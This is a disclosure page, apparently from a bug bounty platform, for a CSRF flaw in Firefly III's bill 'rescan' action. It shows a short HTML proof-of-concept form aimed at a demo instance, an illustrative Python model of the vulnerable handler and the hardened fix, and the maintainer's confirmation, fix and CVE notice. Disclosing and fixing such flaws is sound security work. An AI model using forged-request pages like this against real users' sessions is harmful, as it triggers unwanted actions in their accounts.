Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii

Valid

Reported on

Oct 23rd 2021


Description

There is a CSRF on the "Run rules again" action.

Proof of Concept

PoC.html:

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.firefly-iii.org/bills/rescan/2">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
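The issue the PoC relies on is that the rescan endpoint changes state on a plain GET, so a browser that auto-attaches the session cookie will carry out the action for any page that navigates to that URL. The following is an added example, not Firefly III's code: it models the vulnerable handler and the hardened shape of the fix (POST only, synchronizer token bound to the session, Origin check) as plain functions so the difference can be exercised offline. The request model, session store and the `_token` field name are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field

@dataclass
class Request:
    """Constructed stand-in for an HTTP request (assumption: not a real framework)."""
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)

# Constructed server-side session store: session id -> user and per-session CSRF token
SESSIONS = {"sess-abc": {"user": "alice", "csrf": secrets.token_hex(16)}}
SITE_ORIGIN = "https://demo.firefly-iii.org"  # host used in the report's PoC
rescanned = []  # records which bill ids were actually rescanned

def session_for(req):
    return SESSIONS.get(req.cookies.get("session"))

def rescan_vulnerable(req, bill_id):
    """Vulnerable pattern: a state change on GET. The browser attaches the
    session cookie automatically, so the PoC form's GET is enough to trigger it."""
    if session_for(req) is None:
        return 302  # not logged in: redirect to login
    rescanned.append(bill_id)
    return 200

def rescan_fixed(req, bill_id):
    """Hardened pattern: POST only, token compared in constant time against the
    session's token, plus an Origin/Referer check as defence in depth."""
    sess = session_for(req)
    if sess is None:
        return 302
    if req.method != "POST":
        return 405  # the PoC's GET form stops here
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not origin.startswith(SITE_ORIGIN):
        return 403  # cross-site navigation from another origin
    token = req.form.get("_token", "")
    if not hmac.compare_digest(token, sess["csrf"]):
        return 403  # missing or wrong synchronizer token
    rescanned.append(bill_id)
    return 200
```

Note that the Origin check alone is not sufficient (it can be absent on some navigations), which is why the token remains the primary control.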
We have contacted a member of the firefly-iii team and are waiting to hear back a month ago
James Cole validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
James Cole confirmed that a fix has been merged on b42d8d a month ago
James Cole has been awarded the fix bounty
show.twig#L99-L129 has been validated
ShowController.php#L83-L97 has been validated
James Cole
a month ago

Maintainer


Nice find, fixed!

Jamie Slome
a month ago

Admin


CVE published! 🎊